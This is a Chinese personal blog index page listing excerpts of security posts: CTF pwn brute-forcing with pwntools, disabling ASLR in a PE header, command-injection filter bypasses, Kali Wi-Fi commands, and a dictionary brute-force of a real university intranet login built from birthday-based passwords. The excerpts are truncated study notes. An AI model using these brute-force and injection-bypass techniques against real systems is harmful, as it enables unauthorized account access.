自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Rog's Blog

菜鸡一枚

  • 博客(10)
  • 收藏
  • 关注

原创 记录一次在Win7x64上遍历EPROCESS触发蓝屏后的Debug

定义PEPROCESS pEprocess;ULONG ulProcessID;ulProcessID = (ULONG)pEprocess + 0x180;用ULONG类型来截取pEprocess后运算会出现高32位清零,低32位存在数值,内存地址错误。mov rax,dword ptr ds:[rax]这条指令读取内存地址后触发0xc0000005内存越界访问异常遂改为PEPROCESS pEprocess;ULONGLONG ulProcessID;ulProcessID =

2021-09-29 02:31:27 215

转载 2021-06-25

w= Word (2 byte short integer)dw = DWord (4 byte integer)p = untyped pointerlp = generic long pointerlpsz = long pointer to a null-terminated stringhttps://www.vbforums.com/showthread.php?353039-What-do-w-dw-lpsz-etc-stand-for

2021-06-25 13:01:35 139

原创 2021-06-23

strlen(str)*sizeof(char)==strlen(str)wcslen(str)*sizeof(wchar_t)≠wcslen(strl)

2021-06-23 14:28:42 95

原创 通过更改DllCharacteristics关闭ASLR地址空间随机化

前言:在更改PE文件时,通过x32dbg调试发现imagebase并不是0x400000h,而是变化的值,于是了解到ASLR的概念工具:010Editor、x64dbg、PE知识步骤:1,在PE文件中定位到DLLCharacteristic结构体,其值为0x8410,换算到二进制属性如下图2,讲其中的DYNAMIC_BASE属性改为0,也就是将其改为0x81003,再次运行程序,通过x32dbg调试发现EntryPoint变成了4开头的...

2021-04-28 16:58:44 749

原创 针对简单Pwn溢出题的爆破

爆破大法好例子:BUUCTF rip首先得到源程序pwn1file pwn1checksec pwn1啥也没有,很好然后拖到IDA64分析一波发现漏洞函数,地址为 0x401186 ,很好祭出脚本,开始爆破from pwn import *def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact

2021-04-19 01:20:43 950

原创 某高校校园内网登录页面爆破

某高校校园内网登录默认密码为身份证后八位的前七位推断密码为生日加三位随机数,生成密码字典f = open('password.txt', mode='a+')for i in range(int(input()), int(input())): f.write('0' + str(i) + '\n') f.close通过WireShark抓包发现页面通过get请求提交参数,编写爆破脚本import jsonimport reimport threadingimport ti

2021-04-16 16:03:38 1218 1

原创 PHP COMMON HACKING FUNCTION

1、eval()2、print_r()3、system()4、scandir()5、echo()6、var_dump()7、show_source()8、highlight_file()

2021-04-13 23:51:58 152 2

原创 XOR解密思路------爆破

例子:2018 护网杯 迟来的签到题http://www.bmzclub.cn/challenges#2018%20%E6%8A%A4%E7%BD%91%E6%9D%AF%20%E8%BF%9F%E6%9D%A5%E7%9A%84%E7%AD%BE%E5%88%B0%E9%A2%98下载压缩包后发现像是base64加密字符串给了提示 easy_xor???故直接祭出脚本爆破python easy_xor.py > result && strings result |grep

2021-04-13 01:31:55 1635 4

原创 关于KaliLinux连接WiFi

1、使用wireless-tools连接open网络iwconfig wlan0 获取连接状态iwlist wlan0 scan 扫描可用热点iwconfig wlan0 mode ad-hoc 设置操作模式为 ad-hoc.iwconfig wlan0 essid your_essid 连接到开放网络iwconfig wlan0 essid your_essid freq 2432M 连接到开放网络的一个频道iwconfig wlan0 essid your_essid key your_ke

2021-04-12 22:52:26 5909 2

原创 CTF命令执行与绕过

浅谈CTF中命令执行与绕过的小技巧一、空格绕过1.cat<filename shell2.cat<>filename shell3.{cat,filename} shell4.%09 符号 php5.cat$IFS$9filename cat${IFS}filename shell二、命令分隔符号1.ls /;cat filename shell2.ls /&cat filename shell3.ls /|cat filename shell4.%0a p

2021-04-12 01:35:42 1377

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除